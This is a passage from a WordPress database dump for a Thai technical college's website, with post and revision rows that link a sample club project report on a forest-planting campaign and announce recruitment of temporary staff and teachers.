href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></span></h3>\r\n<h3></h3>\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-revision-v1', '', '', '2018-05-21 16:46:20', '2018-05-21 09:46:20', '', 2558, 'http://www.technicrayong.ac.th/2558-revision-v1/', 0, 'revision', '', 0),
(2610, 3, '2018-05-22 08:57:05', '2018-05-22 01:57:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (เจ้าหน้าที่) จำนวน 3 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b9%80', '', '', '2018-05-22 09:04:57', '2018-05-22 02:04:57', '', 0, 'http://www.technicrayong.ac.th/?p=2610', 422, 'post', '', 0),
(2611, 3, '2018-05-22 08:49:29', '2018-05-22 01:49:29', '', 'รับสมัครคัดเลือกลูกจ้างชั่วคราว', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%88%e0%b9%89%e0%b8%b2', '', '', '2018-05-22 08:49:29', '2018-05-22 01:49:29', '', 2610, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รับสมัครคัดเลือกลูกจ้างชั่วคราว.pdf', 0, 'attachment', 'application/pdf', 0),
(2612, 3, '2018-05-22 08:54:46', '2018-05-22 01:54:46', '<h3><a href=\"/wp-content/uploads/2018/05/ปกโครงการ.pdf\">1 ปกโครงการ</a></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></span></h3>\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></span></h3>\n<h3></h3>\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-autosave-v1', '', '', '2018-05-22 08:54:46', '2018-05-22 01:54:46', '', 2558, 'http://www.technicrayong.ac.th/2558-autosave-v1/', 0, 'revision', '', 0),
(2613, 3, '2018-05-22 08:57:05', '2018-05-22 01:57:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (เจ้าหน้าที่) จำนวน 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '2610-revision-v1', '', '', '2018-05-22 08:57:05', '2018-05-22 01:57:05', '', 2610, 'http://www.technicrayong.ac.th/2610-revision-v1/', 0, 'revision', '', 0),
(2615, 3, '2018-05-22 09:03:18', '2018-05-22 02:03:18', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (ครูอัตราจ้าง) จำนวน 7 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%84%e0%b8%a5%e0%b9%80-2', '', '', '2018-05-22 09:03:18', '2018-05-22 02:03:18', '', 0, 'http://www.technicrayong.ac.th/?p=2615', 421, 'post', '', 0),
(2616, 3, '2018-05-22 09:02:27', '2018-05-22 02:02:27', '', 'รับสมัครคัดเลือกครูอัตราจ้าง (2)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95-2', '', '', '2018-05-22 09:02:27', '2018-05-22 02:02:27', '', 2615, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รับสมัครคัดเลือกครูอัตราจ้าง-2.pdf', 0, 'attachment', 'application/pdf', 0),
(2617, 3, '2018-05-22 09:02:46', '2018-05-22 02:02:46', '', 'รับสมัครคัดเลือกลูกจ้างชั่วคราว', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%88%e0%b9%89%e0%b8%b2-2', '', '', '2018-05-22 09:02:46', '2018-05-22 02:02:46', '', 2615, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รับสมัครคัดเลือกลูกจ้างชั่วคราว-1.pdf', 0, 'attachment', 'application/pdf', 0),
(2618, 3, '2018-05-22 09:03:18', '2018-05-22 02:03:18', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (ครูอัตราจ้าง) จำนวน 7 อัตรา', '', 'inherit', 'closed', 'closed', '', '2615-revision-v1', '', '', '2018-05-22 09:03:18', '2018-05-22 02:03:18', '', 2615, 'http://www.technicrayong.ac.th/2615-revision-v1/', 0, 'revision', '', 0),
(2619, 3, '2018-05-22 09:03:28', '2018-05-22 02:03:28', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (ครูอัตราจ้าง) จำนวน 7 อัตรา', '', 'inherit', 'closed', 'closed', '', '2615-autosave-v1', '', '', '2018-05-22 09:03:28', '2018-05-22 02:03:28', '', 2615, 'http://www.technicrayong.ac.th/2615-autosave-v1/', 0, 'revision', '', 0),
(2620, 3, '2018-05-22 09:05:05', '2018-05-22 02:05:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (เจ้าหน้าที่) จำนวน 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '2610-autosave-v1', '', '', '2018-05-22 09:05:05', '2018-05-22 02:05:05', '', 2610, 'http://www.technicrayong.ac.th/2610-autosave-v1/', 0, 'revision', '', 0),
(2621, 3, '2018-05-22 09:03:56', '2018-05-22 02:03:56', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (เจ้าหน้าที่) จำนวน 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '2610-revision-v1', '', '', '2018-05-22 09:03:56', '2018-05-22 02:03:56', '', 2610, 'http://www.technicrayong.ac.th/2610-revision-v1/', 0, 'revision', '', 0),
(2622, 3, '2018-05-22 09:04:57', '2018-05-22 02:04:57', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (เจ้าหน้าที่) จำนวน 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '2610-revision-v1', '', '', '2018-05-22 09:04:57', '2018-05-22 02:04:57', '', 2610, 'http://www.technicrayong.ac.th/2610-revision-v1/', 0, 'revision', '', 0),
(2623, 3, '2018-05-22 09:15:06', '2018-05-22 02:15:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4edit-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'publish', 'closed', 'open', '', 'announcement-for-personal-recruitment-as-a-temporary-employee-foreign-teacher-for-2-positions', '', '', '2018-05-22 11:09:48', '2018-05-22 04:09:48', '', 0, 'http://www.technicrayong.ac.th/?p=2623', 420, 'post', '', 0),
(2624, 3, '2018-05-22 09:14:07', '2018-05-22 02:14:07', '', 'รับสมัครคัดเลือกครูต่างชาติ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%95%e0%b9%88%e0%b8%b2', '', '', '2018-05-22 09:14:07', '2018-05-22 02:14:07', '', 2623, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รับสมัครคัดเลือกครูต่างชาติ.pdf', 0, 'attachment', 'application/pdf', 0),
(2625, 3, '2018-05-22 09:15:06', '2018-05-22 02:15:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'inherit', 'closed', 'closed', '', '2623-revision-v1', '', '', '2018-05-22 09:15:06', '2018-05-22 02:15:06', '', 2623, 'http://www.technicrayong.ac.th/2623-revision-v1/', 0, 'revision', '', 0),
(2627, 3, '2018-05-22 09:24:04', '2018-05-22 02:24:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'publish', 'closed', 'open', '', 'announcement-for-personal-recruitment-as-a-temporary-employee-foreign-teacher-for-2-positions-2', '', '', '2018-05-22 11:08:15', '2018-05-22 04:08:15', '', 0, 'http://www.technicrayong.ac.th/?p=2627', 419, 'post', '', 0),
